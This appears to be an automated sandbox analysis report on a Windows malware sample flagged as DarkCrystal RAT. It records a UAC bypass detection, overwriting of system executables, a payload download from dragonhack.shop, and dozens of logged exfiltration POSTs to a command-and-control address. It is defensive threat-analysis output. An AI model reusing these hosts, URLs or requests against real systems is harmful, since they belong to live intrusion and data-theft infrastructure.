                                Source: 2.0.d3yngi1q.wji.exe.cf0000.0.unpackString decryptor: [["http://147.45.47.151/AsyncPrivategeneratorGenerator/generatorphp/Downloads/Request/videoPublicDownloadsBase/","ImageApilinux"]]

                                Exploits

                                barindex
                                Yara detected UAC Bypass using CMSTP
                                Source: Yara matchFile source: 00000000.00000002.1609904365.0000019061D91000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: Process Memory Space: Wh2c6sgwRo.exe PID: 7520, type: MEMORYSTR
                                Source: Wh2c6sgwRo.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                Source: unknownHTTPS traffic detected: 91.149.219.45:443 -> 192.168.2.8:49706 version: TLS 1.2
                                Source: Wh2c6sgwRo.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                Source: Binary string: 8C:\Users\user\AppData\Local\Temp\obsldskd\obsldskd.pdb source: d3yngi1q.wji.exe, 00000002.00000002.1641016699.00000000035D2000.00000004.00000800.00020000.00000000.sdmp
                                Source: Binary string: 8C:\Users\user\AppData\Local\Temp\zrf14fw5\zrf14fw5.pdb source: d3yngi1q.wji.exe, 00000002.00000002.1641016699.00000000035D2000.00000004.00000800.00020000.00000000.sdmp

                                Spreading

                                barindex
                                Infects executable files (exe, dll, sys, html)
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSystem file written: C:\Windows\System32\SecurityHealthSystray.exeJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exeFile opened: C:\Users\userJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exeFile opened: C:\Users\user\AppDataJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exeFile opened: C:\Users\user\AppData\Local\TempJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exeFile opened: C:\Users\user\Desktop\desktop.iniJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exeFile opened: C:\Users\user\Documents\desktop.iniJump to behavior

                                Networking

                                barindex
                                Suricata IDS alerts for network traffic
                                Source: Network trafficSuricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.8:49713 -> 147.45.47.151:80
                                Source: Network trafficSuricata IDS: 2048130 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Exfiltration (POST) : 192.168.2.8:49728 -> 147.45.47.151:80
                                Uses ping.exe to check the status of other devices and networks
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                                Source: global trafficTCP traffic: 192.168.2.8:49705 -> 147.45.44.151:5555
                                Source: global trafficHTTP traffic detected: GET /done.exe HTTP/1.1Host: dragonhack.shopConnection: Keep-Alive
                                Source: global trafficHTTP traffic detected: GET /json/ HTTP/1.1Content-Type: application/jsonHost: ip-api.comConnection: Keep-Alive
                                Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                                Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                                Source: Joe Sandbox ViewIP Address: 208.95.112.1 208.95.112.1
                                Source: Joe Sandbox ViewASN Name: FREE-NET-ASFREEnetEU FREE-NET-ASFREEnetEU
                                Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                                Source: unknownDNS query: name: ip-api.com
                                Source: unknownDNS query: name: ip-api.com
                                Source: global trafficHTTP traffic detected: POST /AsyncPrivategeneratorGenerator/generatorphp/Downloads/Request/videoPublicDownloadsBase/ImageApilinux.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 147.45.47.151Content-Length: 344Expect: 100-continueConnection: Keep-Alive
                                Source: global trafficHTTP traffic detected: POST /AsyncPrivategeneratorGenerator/generatorphp/Downloads/Request/videoPublicDownloadsBase/ImageApilinux.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 147.45.47.151Content-Length: 384Expect: 100-continue
                                Source: global trafficHTTP traffic detected: POST /AsyncPrivategeneratorGenerator/generatorphp/Downloads/Request/videoPublicDownloadsBase/ImageApilinux.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 147.45.47.151Content-Length: 2512Expect: 100-continue
                                Source: global trafficHTTP traffic detected: POST /AsyncPrivategeneratorGenerator/generatorphp/Downloads/Request/videoPublicDownloadsBase/ImageApilinux.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 147.45.47.151Content-Length: 1564Expect: 100-continue
                                Source: global trafficHTTP traffic detected: POST /AsyncPrivategeneratorGenerator/generatorphp/Downloads/Request/videoPublicDownloadsBase/ImageApilinux.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 147.45.47.151Content-Length: 2504Expect: 100-continue
                                Source: global trafficHTTP traffic detected: POST /AsyncPrivategeneratorGenerator/generatorphp/Downloads/Request/videoPublicDownloadsBase/ImageApilinux.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 147.45.47.151Content-Length: 2512Expect: 100-continue
                                Source: global trafficHTTP traffic detected: POST /AsyncPrivategeneratorGenerator/generatorphp/Downloads/Request/videoPublicDownloadsBase/ImageApilinux.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 147.45.47.151Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
                                Source: global trafficHTTP traffic detected: POST /AsyncPrivategeneratorGenerator/generatorphp/Downloads/Request/videoPublicDownloadsBase/ImageApilinux.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 147.45.47.151Content-Length: 2004Expect: 100-continueConnection: Keep-Alive
                                Source: global trafficHTTP traffic detected: POST /AsyncPrivategeneratorGenerator/generatorphp/Downloads/Request/videoPublicDownloadsBase/ImageApilinux.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 147.45.47.151Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
                                Source: global trafficHTTP traffic detected: POST /AsyncPrivategeneratorGenerator/generatorphp/Downloads/Request/videoPublicDownloadsBase/ImageApilinux.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 147.45.47.151Content-Length: 2512Expect: 100-continue
                                Source: global trafficHTTP traffic detected: POST /AsyncPrivategeneratorGenerator/generatorphp/Downloads/Request/videoPublicDownloadsBase/ImageApilinux.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 147.45.47.151Content-Length: 2512Expect: 100-continue
                                Source: global trafficHTTP traffic detected: POST /AsyncPrivategeneratorGenerator/generatorphp/Downloads/Request/videoPublicDownloadsBase/ImageApilinux.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 147.45.47.151Content-Length: 2004Expect: 100-continue
                                Source: global trafficHTTP traffic detected: POST /AsyncPrivategeneratorGenerator/generatorphp/Downloads/Request/videoPublicDownloadsBase/ImageApilinux.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 147.45.47.151Content-Length: 2512Expect: 100-continue
                                Source: global trafficHTTP traffic detected: POST /AsyncPrivategeneratorGenerator/generatorphp/Downloads/Request/videoPublicDownloadsBase/ImageApilinux.php HTTP/1.1Content-Type: multipart/form-data; boundary=----nCS53NPw2nKhZqltAC7D5xETwvhPigkYiEUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 147.45.47.151Content-Length: 115942Expect: 100-continue
                                Source: global trafficHTTP traffic detected: POST /AsyncPrivategeneratorGenerator/generatorphp/Downloads/Request/videoPublicDownloadsBase/ImageApilinux.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 147.45.47.151Content-Length: 2512Expect: 100-continue
                                Source: global trafficHTTP traffic detected: POST /AsyncPrivategeneratorGenerator/generatorphp/Downloads/Request/videoPublicDownloadsBase/ImageApilinux.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 147.45.47.151Content-Length: 2504Expect: 100-continue
                                Source: global trafficHTTP traffic detected: POST /AsyncPrivategeneratorGenerator/generatorphp/Downloads/Request/videoPublicDownloadsBase/ImageApilinux.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 147.45.47.151Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
                                Source: global trafficHTTP traffic detected: POST /AsyncPrivategeneratorGenerator/generatorphp/Downloads/Request/videoPublicDownloadsBase/ImageApilinux.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 147.45.47.151Content-Length: 1984Expect: 100-continueConnection: Keep-Alive
                                Source: global trafficHTTP traffic detected: POST /AsyncPrivategeneratorGenerator/generatorphp/Downloads/Request/videoPublicDownloadsBase/ImageApilinux.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 147.45.47.151Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
                                Source: global trafficHTTP traffic detected: POST /AsyncPrivategeneratorGenerator/generatorphp/Downloads/Request/videoPublicDownloadsBase/ImageApilinux.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 147.45.47.151Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
                                Source: global trafficHTTP traffic detected: POST /AsyncPrivategeneratorGenerator/generatorphp/Downloads/Request/videoPublicDownloadsBase/ImageApilinux.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 147.45.47.151Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
                                Source: global trafficHTTP traffic detected: POST /AsyncPrivategeneratorGenerator/generatorphp/Downloads/Request/videoPublicDownloadsBase/ImageApilinux.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 147.45.47.151Content-Length: 1992Expect: 100-continueConnection: Keep-Alive
                                Source: global trafficHTTP traffic detected: POST /AsyncPrivategeneratorGenerator/generatorphp/Downloads/Request/videoPublicDownloadsBase/ImageApilinux.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 147.45.47.151Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
                                Source: global trafficHTTP traffic detected: POST /AsyncPrivategeneratorGenerator/generatorphp/Downloads/Request/videoPublicDownloadsBase/ImageApilinux.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 147.45.47.151Content-Length: 2512Expect: 100-continue
                                Source: global trafficHTTP traffic detected: POST /AsyncPrivategeneratorGenerator/generatorphp/Downloads/Request/videoPublicDownloadsBase/ImageApilinux.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 147.45.47.151Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
                                Source: global trafficHTTP traffic detected: POST /AsyncPrivategeneratorGenerator/generatorphp/Downloads/Request/videoPublicDownloadsBase/ImageApilinux.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 147.45.47.151Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
                                Source: global trafficHTTP traffic detected: POST /AsyncPrivategeneratorGenerator/generatorphp/Downloads/Request/videoPublicDownloadsBase/ImageApilinux.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 147.45.47.151Content-Length: 1992Expect: 100-continueConnection: Keep-Alive
                                Source: global trafficHTTP traffic detected: POST /AsyncPrivategeneratorGenerator/generatorphp/Downloads/Request/videoPublicDownloadsBase/ImageApilinux.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 147.45.47.151Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
                                Source: global trafficHTTP traffic detected: POST /AsyncPrivategeneratorGenerator/generatorphp/Downloads/Request/videoPublicDownloadsBase/ImageApilinux.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 147.45.47.151Content-Length: 2512Expect: 100-continue
                                Source: global trafficHTTP traffic detected: POST /AsyncPrivategeneratorGenerator/generatorphp/Downloads/Request/videoPublicDownloadsBase/ImageApilinux.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 147.45.47.151Content-Length: 2512Expect: 100-continue
                                Source: global trafficHTTP traffic detected: POST /AsyncPrivategeneratorGenerator/generatorphp/Downloads/Request/videoPublicDownloadsBase/ImageApilinux.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 147.45.47.151Content-Length: 2512Expect: 100-continue
                                Source: global trafficHTTP traffic detected: POST /AsyncPrivategeneratorGenerator/generatorphp/Downloads/Request/videoPublicDownloadsBase/ImageApilinux.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 147.45.47.151Content-Length: 2004Expect: 100-continue
                                Source: global trafficHTTP traffic detected: POST /AsyncPrivategeneratorGenerator/generatorphp/Downloads/Request/videoPublicDownloadsBase/ImageApilinux.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 147.45.47.151Content-Length: 2512Expect: 100-continue
                                Source: global trafficHTTP traffic detected: POST /AsyncPrivategeneratorGenerator/generatorphp/Downloads/Request/videoPublicDownloadsBase/ImageApilinux.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 147.45.47.151Content-Length: 2512Expect: 100-continue
                                Source: global trafficHTTP traffic detected: POST /AsyncPrivategeneratorGenerator/generatorphp/Downloads/Request/videoPublicDownloadsBase/ImageApilinux.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 147.45.47.151Content-Length: 2512Expect: 100-continue
                                Source: global trafficHTTP traffic detected: POST /AsyncPrivategeneratorGenerator/generatorphp/Downloads/Request/videoPublicDownloadsBase/ImageApilinux.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 147.45.47.151Content-Length: 1984Expect: 100-continue
                                Source: global trafficHTTP traffic detected: POST /AsyncPrivategeneratorGenerator/generatorphp/Downloads/Request/videoPublicDownloadsBase/ImageApilinux.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 147.45.47.151Content-Length: 2512Expect: 100-continue
                                Source: global trafficHTTP traffic detected: POST /AsyncPrivategeneratorGenerator/generatorphp/Downloads/Request/videoPublicDownloadsBase/ImageApilinux.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 147.45.47.151Content-Length: 2512Expect: 100-continue
                                Source: global trafficHTTP traffic detected: POST /AsyncPrivategeneratorGenerator/generatorphp/Downloads/Request/videoPublicDownloadsBase/ImageApilinux.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 147.45.47.151Content-Length: 2512Expect: 100-continue
                                Source: global trafficHTTP traffic detected: POST /AsyncPrivategeneratorGenerator/generatorphp/Downloads/Request/videoPublicDownloadsBase/ImageApilinux.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 147.45.47.151Content-Length: 2512Expect: 100-continue
                                Source: global trafficHTTP traffic detected: POST /AsyncPrivategeneratorGenerator/generatorphp/Downloads/Request/videoPublicDownloadsBase/ImageApilinux.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 147.45.47.151Content-Length: 1984Expect: 100-continue
                                Source: global trafficHTTP traffic detected: POST /AsyncPrivategeneratorGenerator/generatorphp/Downloads/Request/videoPublicDownloadsBase/ImageApilinux.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 147.45.47.151Content-Length: 2512Expect: 100-continue
                                Source: global trafficHTTP traffic detected: POST /AsyncPrivategeneratorGenerator/generatorphp/Downloads/Request/videoPublicDownloadsBase/ImageApilinux.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 147.45.47.151Content-Length: 2512Expect: 100-continue
                                Source: global trafficHTTP traffic detected: POST /AsyncPrivategeneratorGenerator/generatorphp/Downloads/Request/videoPublicDownloadsBase/ImageApilinux.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 147.45.47.151Content-Length: 2512Expect: 100-continue
                                Source: global trafficHTTP traffic detected: POST /AsyncPrivategeneratorGenerator/generatorphp/Downloads/Request/videoPublicDownloadsBase/ImageApilinux.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 147.45.47.151Content-Length: 2004Expect: 100-continue
                                Source: global trafficHTTP traffic detected: POST /AsyncPrivategeneratorGenerator/generatorphp/Downloads/Request/videoPublicDownloadsBase/ImageApilinux.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 147.45.47.151Content-Length: 2512Expect: 100-continue
                                Source: global trafficHTTP traffic detected: POST /AsyncPrivategeneratorGenerator/generatorphp/Downloads/Request/videoPublicDownloadsBase/ImageApilinux.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 147.45.47.151Content-Length: 2512Expect: 100-continue
                                Source: global trafficHTTP traffic detected: POST /AsyncPrivategeneratorGenerator/generatorphp/Downloads/Request/videoPublicDownloadsBase/ImageApilinux.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 147.45.47.151Content-Length: 2512Expect: 100-continue
                                Source: global trafficHTTP traffic detected: POST /AsyncPrivategeneratorGenerator/generatorphp/Downloads/Request/videoPublicDownloadsBase/ImageApilinux.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 147.45.47.151Content-Length: 2004Expect: 100-continue
                                Source: global trafficHTTP traffic detected: POST /AsyncPrivategeneratorGenerator/generatorphp/Downloads/Request/videoPublicDownloadsBase/ImageApilinux.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 147.45.47.151Content-Length: 2512Expect: 100-continue
                                Source: global trafficHTTP traffic detected: POST /AsyncPrivategeneratorGenerator/generatorphp/Downloads/Request/videoPublicDownloadsBase/ImageApilinux.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 147.45.47.151Content-Length: 2512Expect: 100-continue
                                Source: global trafficHTTP traffic detected: POST /AsyncPrivategeneratorGenerator/generatorphp/Downloads/Request/videoPublicDownloadsBase/ImageApilinux.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 147.45.47.151Content-Length: 2512Expect: 100-continue
                                Source: global trafficHTTP traffic detected: POST /AsyncPrivategeneratorGenerator/generatorphp/Downloads/Request/videoPublicDownloadsBase/ImageApilinux.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 147.45.47.151Content-Length: 2512Expect: 100-continue
                                Source: global trafficHTTP traffic detected: POST /AsyncPrivategeneratorGenerator/generatorphp/Downloads/Request/videoPublicDownloadsBase/ImageApilinux.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 147.45.47.151Content-Length: 1992Expect: 100-continue
                                Source: global trafficHTTP traffic detected: POST /AsyncPrivategeneratorGenerator/generatorphp/Downloads/Request/videoPublicDownloadsBase/ImageApilinux.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 147.45.47.151Content-Length: 2512Expect: 100-continue
                                Source: global trafficHTTP traffic detected: POST /AsyncPrivategeneratorGenerator/generatorphp/Downloads/Request/videoPublicDownloadsBase/ImageApilinux.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 147.45.47.151Content-Length: 2512Expect: 100-continue
                                Source: global trafficHTTP traffic detected: POST /AsyncPrivategeneratorGenerator/generatorphp/Downloads/Request/videoPublicDownloadsBase/ImageApilinux.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 147.45.47.151Content-Length: 2512Expect: 100-continue
                                Source: global trafficHTTP traffic detected: POST /AsyncPrivategeneratorGenerator/generatorphp/Downloads/Request/videoPublicDownloadsBase/ImageApilinux.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 147.45.47.151Content-Length: 2512Expect: 100-continue
                                Source: global trafficHTTP traffic detected: POST /AsyncPrivategeneratorGenerator/generatorphp/Downloads/Request/videoPublicDownloadsBase/ImageApilinux.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 147.45.47.151Content-Length: 2004Expect: 100-continue
                                Source: global trafficHTTP traffic detected: POST /AsyncPrivategeneratorGenerator/generatorphp/Downloads/Request/videoPublicDownloadsBase/ImageApilinux.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 147.45.47.151Content-Length: 2512Expect: 100-continue
                                Source: global trafficHTTP traffic detected: POST /AsyncPrivategeneratorGenerator/generatorphp/Downloads/Request/videoPublicDownloadsBase/ImageApilinux.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 147.45.47.151Content-Length: 2512Expect: 100-continue
                                Source: global trafficHTTP traffic detected: POST /AsyncPrivategeneratorGenerator/generatorphp/Downloads/Request/videoPublicDownloadsBase/ImageApilinux.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 147.45.47.151Content-Length: 2512Expect: 100-continue
                                Source: global trafficHTTP traffic detected: POST /AsyncPrivategeneratorGenerator/generatorphp/Downloads/Request/videoPublicDownloadsBase/ImageApilinux.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 147.45.47.151Content-Length: 2004Expect: 100-continue
                                Source: global trafficHTTP traffic detected: POST /AsyncPrivategeneratorGenerator/generatorphp/Downloads/Request/videoPublicDownloadsBase/ImageApilinux.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 147.45.47.151Content-Length: 2504Expect: 100-continue
                                Source: global trafficHTTP traffic detected: POST /AsyncPrivategeneratorGenerator/generatorphp/Downloads/Request/videoPublicDownloadsBase/ImageApilinux.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 147.45.47.151Content-Length: 2500Expect: 100-continue
                                Source: global trafficHTTP traffic detected: POST /AsyncPrivategeneratorGenerator/generatorphp/Downloads/Request/videoPublicDownloadsBase/ImageApilinux.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 147.45.47.151Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
                                Source: global trafficHTTP traffic detected: POST /AsyncPrivategeneratorGenerator/generatorphp/Downloads/Request/videoPublicDownloadsBase/ImageApilinux.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 147.45.47.151Content-Length: 2512Expect: 100-continue
                                Source: global trafficHTTP traffic detected: POST /AsyncPrivategeneratorGenerator/generatorphp/Downloads/Request/videoPublicDownloadsBase/ImageApilinux.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 147.45.47.151Content-Length: 2004Expect: 100-continue
